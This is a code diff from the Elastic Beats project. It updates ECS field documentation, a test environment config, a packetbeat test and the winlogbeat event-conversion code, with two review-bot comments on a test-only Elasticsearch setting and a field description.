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" + return "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" } diff --git a/packetbeat/tests/system/test_0060_flows.py b/packetbeat/tests/system/test_0060_flows.py index ab2e91bfbbc..ae6a4f923fb 100644 --- a/packetbeat/tests/system/test_0060_flows.py +++ b/packetbeat/tests/system/test_0060_flows.py @@ -47,6 +47,7 @@ def test_mysql_flow(self): 'source.bytes': 1480, 'destination.packets': 10, 'destination.bytes': 181133, + 'event.type': ['connection', 'end'], }) start_ts = parse_timestamp(objs[0]['event.start']) diff --git a/testing/environments/snapshot.yml b/testing/environments/snapshot.yml index 4f15ba5582f..c380f83ce9b 100644 --- a/testing/environments/snapshot.yml +++ b/testing/environments/snapshot.yml @@ -19,6 +19,7 @@ services: - "script.context.ingest.cache_max_size=2000" - "script.context.processor_conditional.cache_max_size=2000" - "script.context.template.cache_max_size=2000" + - "action.destructive_requires_name=false" logstash: image: docker.elastic.co/logstash/logstash@sha256:e01cf165142edf8d67485115b938c94deeda66153e9516aa2ce69ee417c5fc33 diff --git a/winlogbeat/_meta/fields.common.yml b/winlogbeat/_meta/fields.common.yml index 7467cad731a..fe6a1951027 100644 --- a/winlogbeat/_meta/fields.common.yml +++ b/winlogbeat/_meta/fields.common.yml @@ -360,6 +360,12 @@ logged. The category used by the Event Logging API (on pre Windows Vista operating systems) is written to this field. + - name: time_created + type: date + required: false + description: > + The event creation time. + - name: process.thread.id type: long required: false diff --git a/winlogbeat/cmd/root.go b/winlogbeat/cmd/root.go index 41259e7cab7..22a7c2562d1 100644 --- a/winlogbeat/cmd/root.go +++ b/winlogbeat/cmd/root.go 
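Review bot: The added `action.destructive_requires_name=false` entry in testing/environments/snapshot.yml has no comment saying why this guard is switched off. With the setting false, index deletion by wildcard or `_all` is accepted. That is reasonable for a throwaway test cluster, but such a line is easily copied into longer-lived compose files. I would put a comment above it, such as `# Test-only: allows wildcard/_all index deletion for test cleanup; do not reuse outside disposable clusters.`, if cleanup is indeed the reason. The service block starts outside the hunk, so I am assuming from the neighbouring `script.context.*` settings that this is the Elasticsearch container.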
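Review bot: The description of the new `time_created` field in winlogbeat/_meta/fields.common.yml, `The event creation time.`, does not say where the value comes from or how it relates to `@timestamp`. Anyone building a timeline from these events needs to know whether this is the time stored in the Windows event record or a time assigned during collection. The two can differ when events are read late or timestamps are rewritten downstream. Once the source is confirmed against the code that populates it, I would expand the text to something like `The time the event was created, as recorded in the Windows event record; may differ from @timestamp if that field is changed during processing.`. The field list this entry sits in starts outside the hunk.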
@@ -37,7 +37,7 @@ const ( Name = "winlogbeat" // ecsVersion specifies the version of ECS that Winlogbeat is implementing. - ecsVersion = "1.8.0" + ecsVersion = "1.9.0" ) // withECSVersion is a modifier that adds ecs.version to events. diff --git a/winlogbeat/docs/fields.asciidoc b/winlogbeat/docs/fields.asciidoc index eae16b68e5c..1dbbbc3189e 100644 --- a/winlogbeat/docs/fields.asciidoc +++ b/winlogbeat/docs/fields.asciidoc @@ -92,6 +92,15 @@ type: keyword -- +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + [[exported-fields-cloud]] == Cloud provider metadata fields @@ -477,6 +486,17 @@ example: Montreal -- +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`client.geo.continent_name`*:: + -- @@ -534,6 +554,18 @@ example: boston-dc -- +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`client.geo.region_iso_code`*:: + -- @@ -556,6 +588,17 @@ example: Quebec -- +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`client.ip`*:: + -- @@ -569,9 +612,12 @@ type: ip + -- MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`client.nat.ip`*:: 
@@ -886,6 +932,18 @@ example: us-east-1 -- +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + [float] === code_signature @@ -903,6 +961,18 @@ example: true -- +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`code_signature.status`*:: + -- @@ -926,6 +996,18 @@ example: Microsoft Corporation -- +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`code_signature.trusted`*:: + -- @@ -1092,6 +1174,17 @@ example: Montreal -- +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`destination.geo.continent_name`*:: + -- @@ -1149,6 +1242,18 @@ example: boston-dc -- +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`destination.geo.region_iso_code`*:: + -- @@ -1171,6 +1276,17 @@ example: Quebec -- +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`destination.ip`*:: + -- 
@@ -1184,9 +1300,12 @@ type: ip + -- MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`destination.nat.ip`*:: @@ -1405,6 +1524,18 @@ example: true -- +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`dll.code_signature.status`*:: + -- @@ -1428,6 +1559,18 @@ example: Microsoft Corporation -- +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`dll.code_signature.trusted`*:: + -- @@ -1488,6 +1631,15 @@ type: keyword -- +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`dll.name`*:: + -- @@ -2233,6 +2385,18 @@ example: true -- +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`file.code_signature.status`*:: + -- @@ -2256,6 +2420,18 @@ example: Microsoft Corporation -- +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`file.code_signature.trusted`*:: + -- @@ -2404,6 +2580,15 @@ type: keyword -- +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`file.inode`*:: + -- 
@@ -2894,6 +3079,17 @@ example: Montreal -- +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`geo.continent_name`*:: + -- @@ -2951,6 +3147,18 @@ example: boston-dc -- +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`geo.region_iso_code`*:: + -- @@ -2973,6 +3181,17 @@ example: Quebec -- +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + [float] === group @@ -3010,8 +3229,9 @@ type: keyword [float] === hash -The hash fields represent different hash algorithms and their values. +The hash fields represent different bitwise hash algorithms and their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). *`hash.md5`*:: @@ -3050,6 +3270,15 @@ type: keyword -- +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + [float] === host 
@@ -3068,6 +3297,35 @@ example: x86_64 -- +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + *`host.domain`*:: + -- @@ -3091,6 +3349,17 @@ example: Montreal -- +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`host.geo.continent_name`*:: + -- @@ -3148,6 +3417,18 @@ example: boston-dc -- +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`host.geo.region_iso_code`*:: + -- @@ -3170,6 +3451,17 @@ example: Quebec -- +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`host.hostname`*:: + -- @@ -3203,10 +3495,13 @@ type: ip *`host.mac`*:: + -- -Host mac addresses. +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`host.name`*:: 
@@ -3219,6 +3514,42 @@ type: keyword -- +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + *`host.os.family`*:: + -- @@ -3496,6 +3827,18 @@ format: bytes -- +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + *`http.request.method`*:: + -- @@ -4029,7 +4372,7 @@ This could be a custom hardware appliance or a server that has been configured t *`observer.egress`*:: + -- -Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object 
@@ -4093,7 +4436,7 @@ example: outside *`observer.egress.zone`*:: + -- -Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. type: keyword @@ -4112,6 +4455,17 @@ example: Montreal -- +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`observer.geo.continent_name`*:: + -- @@ -4169,6 +4523,18 @@ example: boston-dc -- +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`observer.geo.region_iso_code`*:: + -- @@ -4191,6 +4557,17 @@ example: Quebec -- +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`observer.hostname`*:: + -- @@ -4203,7 +4580,7 @@ type: keyword *`observer.ingress`*:: + -- -Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object 
@@ -4267,7 +4644,7 @@ example: outside *`observer.ingress.zone`*:: + -- -Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. type: keyword @@ -4287,10 +4664,13 @@ type: ip *`observer.mac`*:: + -- -MAC addresses of the observer +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`observer.name`*:: @@ -4860,6 +5240,18 @@ example: true -- +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.code_signature.status`*:: + -- @@ -4883,6 +5275,18 @@ example: Microsoft Corporation -- +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.code_signature.trusted`*:: + -- @@ -5005,6 +5409,15 @@ type: keyword -- +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.name`*:: + -- 
@@ -5059,6 +5472,18 @@ example: true -- +*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.parent.code_signature.status`*:: + -- @@ -5082,6 +5507,18 @@ example: Microsoft Corporation -- +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.parent.code_signature.trusted`*:: + -- @@ -5204,6 +5641,15 @@ type: keyword -- +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.parent.name`*:: + -- @@ -5942,6 +6388,17 @@ example: Montreal -- +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`server.geo.continent_name`*:: + -- @@ -5999,6 +6456,18 @@ example: boston-dc -- +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`server.geo.region_iso_code`*:: + -- @@ -6021,6 +6490,17 @@ example: Quebec -- +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`server.ip`*:: + -- 
@@ -6034,9 +6514,12 @@ type: ip + -- MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`server.nat.ip`*:: @@ -6404,6 +6887,17 @@ example: Montreal -- +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`source.geo.continent_name`*:: + -- @@ -6461,6 +6955,18 @@ example: boston-dc -- +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`source.geo.region_iso_code`*:: + -- @@ -6483,6 +6989,17 @@ example: Quebec -- +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`source.ip`*:: + -- @@ -6496,9 +7013,12 @@ type: ip + -- MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`source.nat.ip`*:: @@ -10796,6 +11316,18 @@ required: False -- +*`winlog.time_created`*:: ++ +-- +The event creation time. + + +type: date + +required: False + +-- + *`winlog.process.thread.id`*:: + -- diff --git a/winlogbeat/eventlog/eventlog.go b/winlogbeat/eventlog/eventlog.go index 9302417be2e..88bd4f5fabc 100644 --- a/winlogbeat/eventlog/eventlog.go +++ b/winlogbeat/eventlog/eventlog.go 
@@ -19,19 +19,15 @@ package eventlog import ( "expvar" - "fmt" - "reflect" "strconv" - "strings" "syscall" "time" "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/common" "github.com/elastic/beats/v7/libbeat/logp" - "github.com/elastic/beats/v7/winlogbeat/checkpoint" - "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) // Debug selectors used in this package. @@ -55,12 +51,6 @@ var ( readErrors = expvar.NewMap("read_errors") ) -// Keyword Constants -const ( - keywordAuditFailure = 0x10000000000000 - keywordAuditSuccess = 0x20000000000000 -) - // EventLog is an interface to a Windows Event Log. type EventLog interface { // Open the event log. state points to the last successfully read event @@ -81,7 +71,7 @@ type EventLog interface { // Record represents a single event from the log. type Record struct { - sys.Event + winevent.Event File string // Source file when event is from a file. API string // The event log API type used to read the record. XML string // XML representation of the event. 
@@ -90,78 +80,32 @@ type Record struct { // ToEvent returns a new beat.Event containing the data from this Record. func (e Record) ToEvent() beat.Event { - // Windows Log Specific data - win := common.MapStr{ - "channel": e.Channel, - "event_id": e.EventIdentifier.ID, - "provider_name": e.Provider.Name, - "record_id": e.RecordID, - "task": e.Task, - "api": e.API, - } - addOptional(win, "computer_name", e.Computer) - addOptional(win, "kernel_time", e.Execution.KernelTime) - addOptional(win, "keywords", e.Keywords) - addOptional(win, "opcode", e.Opcode) - addOptional(win, "processor_id", e.Execution.ProcessorID) - addOptional(win, "processor_time", e.Execution.ProcessorTime) - addOptional(win, "provider_guid", e.Provider.GUID) - addOptional(win, "session_id", e.Execution.SessionID) - addOptional(win, "task", e.Task) - addOptional(win, "user_time", e.Execution.UserTime) - addOptional(win, "version", e.Version) - // Correlation - addOptional(win, "activity_id", e.Correlation.ActivityID) - addOptional(win, "related_activity_id", e.Correlation.RelatedActivityID) - // Execution - addOptional(win, "process.pid", e.Execution.ProcessID) - addOptional(win, "process.thread.id", e.Execution.ThreadID) - - if e.User.Identifier != "" { - user := common.MapStr{ - "identifier": e.User.Identifier, - } - win["user"] = user - addOptional(user, "name", e.User.Name) - addOptional(user, "domain", e.User.Domain) - addOptional(user, "type", e.User.Type.String()) - } + win := e.Fields() - addPairs(win, "event_data", e.EventData.Pairs) - userData := addPairs(win, "user_data", e.UserData.Pairs) - addOptional(userData, "xml_name", e.UserData.Name.Local) + win.Delete("time_created") + win.Put("api", e.API) m := common.MapStr{ "winlog": win, } // ECS data + m.Put("event.created", time.Now()) + m.Put("event.kind", "event") m.Put("event.code", e.EventIdentifier.ID) m.Put("event.provider", e.Provider.Name) - addOptional(m, "event.action", e.Task) - addOptional(m, "host.name", e.Computer) - - 
m.Put("event.created", time.Now()) - if e.KeywordsRaw&keywordAuditFailure > 0 { - m.Put("event.outcome", "failure") - } else if e.KeywordsRaw&keywordAuditSuccess > 0 { - m.Put("event.outcome", "success") - } - - addOptional(m, "log.file.path", e.File) - addOptional(m, "log.level", strings.ToLower(e.Level)) - addOptional(m, "message", sys.RemoveWindowsLineEndings(e.Message)) - // Errors - addOptional(m, "error.code", e.RenderErrorCode) - if len(e.RenderErr) == 1 { - addOptional(m, "error.message", e.RenderErr[0]) - } else { - addOptional(m, "error.message", e.RenderErr) - } + rename(m, "winlog.outcome", "event.outcome") + rename(m, "winlog.level", "log.level") + rename(m, "winlog.message", "message") + rename(m, "winlog.error.code", "error.code") + rename(m, "winlog.error.message", "error.message") - addOptional(m, "event.original", e.XML) + winevent.AddOptional(m, "log.file.path", e.File) + winevent.AddOptional(m, "event.original", e.XML) + winevent.AddOptional(m, "event.action", e.Task) + winevent.AddOptional(m, "host.name", e.Computer) return beat.Event{ Timestamp: e.TimeCreated.SystemTime, 
@@ -170,76 +114,14 @@ func (e Record) ToEvent() beat.Event { } } -// addOptional adds a key and value to the given MapStr if the value is not the -// zero value for the type of v. It is safe to call the function with a nil -// MapStr. -func addOptional(m common.MapStr, key string, v interface{}) { - if m != nil && !isZero(v) { - m.Put(key, v) - } -} - -// addPairs adds a new dictionary to the given MapStr. The key/value pairs are -// added to the new dictionary. If any keys are duplicates, the first key/value -// pair is added and the remaining duplicates are dropped. -// -// The new dictionary is added to the given MapStr and it is also returned for -// convenience purposes. -func addPairs(m common.MapStr, key string, pairs []sys.KeyValue) common.MapStr { - if len(pairs) == 0 { - return nil - } - - h := make(common.MapStr, len(pairs)) - for i, kv := range pairs { - // Ignore empty values. - if kv.Value == "" { - continue - } - - // If the key name is empty or if it the default of "Data" then - // assign a generic name of paramN. - k := kv.Key - if k == "" || k == "Data" { - k = fmt.Sprintf("param%d", i+1) - } - - // Do not overwrite. - _, exists := h[k] - if !exists { - h[k] = sys.RemoveWindowsLineEndings(kv.Value) - } else { - debugf("Dropping key/value (k=%s, v=%s) pair because key already "+ - "exists. event=%+v", k, kv.Value, m) - } - } - - if len(h) == 0 { - return nil - } - - m[key] = h - return h -} - -// isZero return true if the given value is the zero value for its type. 
-func isZero(i interface{}) bool { - v := reflect.ValueOf(i) - switch v.Kind() { - case reflect.Array, reflect.String: - return v.Len() == 0 - case reflect.Bool: - return !v.Bool() - case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: - return v.Int() == 0 - case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: - return v.Uint() == 0 - case reflect.Float32, reflect.Float64: - return v.Float() == 0 - case reflect.Interface, reflect.Map, reflect.Ptr, reflect.Slice: - return v.IsNil() +// rename will rename a map entry overriding any previous value +func rename(m common.MapStr, oldKey, newKey string) { + v, err := m.GetValue(oldKey) + if err != nil { + return } - return false + m.Put(newKey, v) + m.Delete(oldKey) } // incrementMetric increments a value in the specified expvar.Map. The key diff --git a/winlogbeat/eventlog/wineventlog.go b/winlogbeat/eventlog/wineventlog.go index 9f832aac0af..6c9ded37c40 100644 --- a/winlogbeat/eventlog/wineventlog.go +++ b/winlogbeat/eventlog/wineventlog.go @@ -36,6 +36,7 @@ import ( "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/winlogbeat/checkpoint" "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" win "github.com/elastic/beats/v7/winlogbeat/sys/wineventlog" ) @@ -317,14 +318,14 @@ func (l *winEventLog) eventHandles(maxRead int) ([]win.EvtHandle, int, error) { func (l *winEventLog) buildRecordFromXML(x []byte, recoveredErr error) (Record, error) { includeXML := l.config.IncludeXML - e, err := sys.UnmarshalEventXML(x) + e, err := winevent.UnmarshalXML(x) if err != nil { e.RenderErr = append(e.RenderErr, err.Error()) // Add raw XML to event.original when decoding fails includeXML = true } - err = sys.PopulateAccount(&e.User) + err = winevent.PopulateAccount(&e.User) if err != nil { debugf("%s SID %s account lookup failed. %v", l.logPrefix, e.User.Identifier, err) 
